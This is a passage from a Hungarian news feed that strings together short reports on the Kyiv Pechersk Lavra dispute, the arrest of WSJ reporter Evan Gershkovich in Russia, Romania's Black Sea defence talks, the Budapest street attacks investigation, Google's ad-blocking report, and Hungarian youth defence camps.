A kulturális minisztérium döntése alapján az UPC-nek szerdán el kellett volna hagynia a Lavrát, amit nem tettek meg, csütörtökön még istentiszteletet tartottak orosz nyelven. Csütörtökön akarta ugyanis megkezdeni munkáját a barlangkolostor tulajdonában lévő ingatlanok átvételével és átadásával foglalkozó bizottság, de az UPC hívei nem engedték be a testület tagjait a Lavra területére.

The post Elutasították a kijevi Pecserszka Lavra szerzeteseinek keresetét appeared first on .

„A lehetséges legerőteljesebb módon elítéljük a Kremlnek az újságírók és a civil társadalom hangjainak megfélemlítésére, elnyomására és megbüntetésére irányuló folyamatos kísérleteit” — fogalmazott a State Department, amely arról is tájékoztatást adott, hogy állandó kapcsolatban vannak az újságíró munkaadójával, a The Wall Street Journal (WSJ) amerikai üzleti-politikai napilappal.

Az amerikai külügyi tárca közleménye egyben az Oroszországban élő vagy oda látogató amerikai állampolgárokat Oroszország azonnali elhagyására kéri az őket fenyegető orosz veszélyre hivatkozva.

Az orosz Szövetségi Biztonsági Szolgálat (FSZB) csütörtökön jelentette be, hogy kémkedés gyanújával őrizetbe vette a WSJ moszkvai tudósítóját a Moszkvától 1800 kilométerre keletre fekvő Jekatyerinburgban. Az orosz hatóságok azt állítják: Evan Gershkovich minősített információkat próbált megszerezni.

Gershkovich az első amerikai újságíró, akit a hidegháború vége óta az orosz hatóságok kémkedés miatt őrizetbe vettek. Az utolsó ilyen eset 1986-ban történt, amikor Nicholas Daniloffot, a U. S. News & World Report 52 éves moszkvai tudósítóját a KGB letartóztatta, de őt húsz nap őrizet után, fogolycsere keretében szabadon engedték.

Oroszországban a törvényhozás mindkét háza a közelmúltban arról fogadott el törvényt, hogy akár 15 év börtönt is kaphat az az újságíró, aki hamis információkat terjeszt az orosz hadseregről. A jogszabály miatt több külföldi médium – a kockázatokra hivatkozva – felfüggesztette helyszíni tudósítói tevékenységét Oroszországban.

The post Washington elítéli az újságírók megfélemlítését Oroszországban appeared first on .

A bukaresti védelmi tárca (MAPN) közleménye szerint Angel Tilvar erről tárgyalt Washingtonban, amikor amerikai partnere, Lloyd Austin fogadta őt a Pentagonban. A találkozón az Oroszországi Föderáció Ukrajna ellen indított háborújáról, a régió biztonságáról, az Egyesült Államok fegyveres erőinek jelenlétéről és a NATO védelmi és elrettentési képességének erősítésről egyeztettek a felek.

„Úgy gondoljuk, hogy sürgősen szükség van egy átfogó stratégiára a Fekete-tengerre vonatkozóan, az Egyesült Államok vezetésével, a régió kulcsszereplőinek bevonásával. Politikánkat is erősíteni fogja, ha az a NATO és az Egyesült Államok következetes és kitartó jelenlétére alapul, ha abban Amerika vezető szerepet játszik” – idézte a román védelmi miniszter Washingtonban tett kijelentését a MAPN közleménye.

Tilvar hozzátette: az Egyesült Államok tavaly már bebizonyította a Fekete-tenger térsége iránti elkötelezettségét, amikor a Romániában állomásozó csapatait a 101. Légi Szállítású Hadosztály 2. lövészdandárjának katonáival egészítette ki. A júniusi vilniusi NATO-csúcstól Románia a Fekete-tenger stratégiai jelentőségét kimondó tavalyi, madridi csúcs határozatainak gyakorlatba ültetését, és a térségbeli partnerek – Ukrajna és Moldova – támogatására irányuló döntések meghozatalát várja.

Tilvar kiemelte: washingtoni látogatására jelképes alkalommal, a Románia és az Egyesült Államok között megkötött stratégiai partnerségi megállapodás 30. évfordulójának évében került sor.

Románia az ukrajnai háború kitörését követően úgy döntött: 2023-tól kezdődően a GDP 2,5 százalékára emeli (a korábbi két százalékról) védelmi kiadásait. A román Legfelsőbb Védelmi Tanács 2017-es határozata értelmében a bukaresti védelmi minisztérium az utóbbi években több mint 10 milliárd dolláros költségvetésű haderőfejlesztésbe kezdett, amelynek során főleg amerikai gyártmányú haditechnikát – Patriot rakétaelhárító rendszereket, HIMARS sorozatvetőket és F-16-os harci repülőket – szerez be.

2025-ben újra magyar Gripenek védik a balti államok légterét
Döntés született arról, hogy Magyarország lojális NATO-szövetségesként immár negyedik alkalommal, 2025-ben ismét részt vesz a balti államok légtérvédelmében. Magyarország eddig háromszor vett részt a balti országok légterének védelmében, és a negyedik körről is döntés született. A hazánkban található közép-európai többnemzeti haderőparancsnokság elérte azt a működési szintet, amelynek nyomán hamarosan odalátogat az európai NATO-erők főparancsnoka.

The post Orosz agresszió: Románia új NATO-stratégiát sürget a Fekete-tenger térsége számára appeared first on .

A közösség tagja elleni erőszak miatt folytatott eljárásban az eddig kihallgatott négy gyanúsítotton kívül már további hat külföldi ellen van érvényben elfogatóparancs. A fővárosban február 11-e előtti napokban elkövetett támadások felderítésére a BRFK-n létrehozott nyomozócsoport folyamatosan dolgozik a bűncselekmény-sorozat felderítésén – írták.

A budapesti nyomozók szorosan együttműködnek a német rendőrséggel. Az eljárásnak négy gyanúsítottja van: egy német és egy olasz állampolgár letartóztatásban van, egy német bűnügyi felügyeletét rendelték el, egy magyar pedig szabadlábon védekezik.

Korábban a bűncselekmény-sorozattal összefüggésben a BRFK további három német állampolgár ellen adott ki elfogatóparancsot. A nemzetközi együttműködés eredményeként a pénteki közlés szerint újabb három német állampolgárral bővült az elfogatóparanccsal körözöttek köre.

A BRFK „üzenete egyértelmű: nem tűrjük, hogy akár ideológiai alapon, akár anélkül emberekre támadjanak a fővárosban. A jogszabályok által lehetővé tett valamennyi eszközt igénybe vesszük, hogy az elkövetőket állampolgárságra, ideológiára, nemre való tekintet nélkül azonosítsuk, és lefolytassuk velük szemben az eljárást” – olvasható a közleményben.

A Fővárosi Főügyészség korábbi tájékoztatása szerint a BRFK a Budapest különböző pontjain a „kitörés napja” elnevezésű rendezvény vélt résztvevői ellen a február 11-ét megelőző napokban elkövetett támadások miatt közösség tagja elleni, felfegyverkezve, csoportosan elkövetett erőszak, súlyos testi sértés és más bűncselekmények miatt nyomoz. Az elkövetők szélsőjobboldali nézetekre utaló öltözékük miatt támadták meg a számukra ismeretlen sértetteket.

Korábbi sajtótájékoztatóján a rendőrség azt közölte, hogy a teleszkópos botokkal, úgynevezett viperákkal, valamint boxerekkel és más eszközökkel végrehajtott támadásokat hét-nyolc ember követte el, de a társaságnak tíz-tizenöt tagja lehet.

A támadók előbb lengyel turistákat vertek össze – a sértettek közül ketten súlyos, töréses sérüléseket szenvedtek -, majd egy nappal később egy férfit bántalmaztak Gazdagréten, ő könnyebben sérült meg. Ezt követően a belvárosi Bank utcában egy koncertről hazainduló párt vertek össze, a férfi súlyosan megsérült, az I. kerületi Mikó utcában pedig egy német párt bántalmaztak súlyosan.

The post Újabb külföldieket keresnek a februári budapesti utcai támadások ügyében appeared first on .

A jelentés szerint a Google emellett több mint 1,5 milliárd kiadói felületen blokkolta vagy korlátozta a hirdetések megjelenését, és több mint 143 ezer kiadói oldalon hajtott végre széleskörű, teljes webhelyre vonatkozó biztonsági intézkedéseket.

Kiemelt figyelmet fordítottak tavaly a csalások elleni fellépésre. A csalások száma továbbra is folyamatosan nő. Bár az átverések nem számítanak újdonságnak a digitális hirdetések világában, valódi pénzügyi károkat okozhatnak, ezért a Google elkötelezetten küzd platformjain a különböző csalások ellen.

Tavaly a vállalat bővítette a pénzügyi szolgáltatások ellenőrzésére irányuló programját, amely megköveteli a hirdetőktől annak bizonyítását, hogy a helyi szabályozó hatóság engedélyezte számukra termékeik és szolgáltatásaik reklámozását. Ez egy újabb lépcsőfok a csalókkal szembeni biztonsági intézkedések terén, mely még hatékonyabban védi az embereket a pénzügyi csalásoktól. A Google eddig 11 országban indította el a programot, köztük az Egyesült Királyságban, Ausztráliában és Szingapúrban, 2023-ban pedig további bővítéseket tervez.

Tavaly a Google 142 millió hirdetést blokkolt vagy távolított el a megtévesztésre vonatkozó irányelv, további 198 millió hirdetést pedig a pénzügyi szolgáltatásokra irányuló irányelv megsértése miatt.

Az elmúlt években a vállalat intézkedéseket dolgozott ki a téves információk és a megbízhatatlan állítások elleni küzdelemre vonatkozóan az általános hirdetési ökoszisztémában. Ezek közé tartoznak az egészségre vonatkozó, káros és a bizonyíthatóan hamis állítások elleni irányelvek. 2022-ben több mint 300 ezer sajtókiadói oldalon tiltotta le olyan hirdetések futtatását, amelyek nem feleltek meg ezen szabályozásoknak, illetve több mint 24 millió, az irányelveket sértő hirdetést blokkolt. Továbbá több mint 51,2 millió hirdetést blokkolt és távolított el nem megfelelő tartalom miatt, beleértve a gyűlöletbeszédre és erőszakra vonatkozó, illetve egészségügyi témákra vonatkozó káros állításokat, valamint 20,6 millió veszélyes termékeket vagy szolgáltatásokat, például fegyvereket és robbanóanyagokat népszerűsítő hirdetést – közölték.

Az ukrajnai háború kitörését követően a cég megakadályozta az olyan hirdetéseket, amelyek kihasználják, tagadják vagy elnézően írnak a háborúról. Ez kiegészíti azokat a régóta érvényben lévő irányelveket, amelyek megtiltják az erőszakra uszító vagy tragikus események megtörténtét tagadó tartalmak hirdetésekként való futtatását vagy az azokhoz kapcsolódó, a Google szolgáltatásain keresztüli pénzszerzést. A Google a termékeit érintő oroszországi kereskedelmi tevékenységeinek többségét is szüneteltette.

Tavaly a vállalat több mint 17 millió, az ukrajnai háborúval kapcsolatos hirdetést blokkolt, ezen kívül pedig több mint 275 államilag finanszírozott médiakiadvány weboldaláról távolított el hirdetéseket a platformjain.

The post A Google tavaly több mint 5,2 milliárd rosszindulatú hirdetést törölt appeared first on .

Azt írták, idén júniustól augusztusig csaknem száz táborban, 135 turnusban táborozhatnak a 12 és 18 év közötti fiatalok. Idén 17 féle különböző honvédelmi témájú tematikából lehet választani az ország mintegy 59 különböző helyszínén.

A HM közleménye szerint idén is változatos programokkal várja a táborokba jelentkezőket a Magyar Honvédség, a tematikus nyári programsorozat több ezer diák számára jelent izgalmakkal és élményekkel teli, aktív nyári elfoglaltságot. Idén a hetedik alkalommal rendezi meg a Magyar Honvédség a nyári szünetben a 12-18 éves korosztálynak szóló honvédelmi táborokat.

Kiemelték: a táborokban nem katona-növendékeket nevelnek, „a résztvevőknek – azon túl, hogy jól érezzék magukat – semmi kötelezettségük nincs a sereg felé”. Ugyanakkor biztonságos körülmények között, szakemberek irányításával és felügyelete mellett, szórakoztató módon próbálhatnak ki új dolgokat, miközben megismerik saját határaikat, kilépnek a komfortzónájukból.

Mondhatni életük egyik legnagyobb kalandjában vesznek rész, miközben játszva sajátítanak el olyan képességeket és ismereteket, amiket a mindennapi élet során is hasznosítani tudnak majd – írta a tárca.

A diákok a honvédelmi táborokban a sokszínű programokon keresztül betekintést nyernek az általuk választott témakörbe, ám ami ennél fontosabb, a mindennapi gyakorlattól eltérő, szokatlan, újszerű feladatokat is biztosítanak számukra a szervezők, amelyekkel erősítik a csoporton belüli összetartozást, az egymásra figyelést, az „együtt gondolkodást”. A gyermekek közösségben vannak, kiléphetnek a szürke hétköznapokból, új barátokat szerezhetnek – sorolták.

Hangsúlyozták: a honvédelmi táborok fontos részét képezik a hazafias és honvédelmi nevelésnek, hiszen ezen keresztül a fiatalok betekintést nyerhetnek a Magyar Honvédség és a katonák mindennapjaiba. Kiemelték: a táborok sikere 2016 óta folyamatosan töretlen, a meghirdetett helyek órák, napok alatt betelnek.

The post HM: hétfőtől lehet jelentkezni a honvédelmi táborokba appeared first on .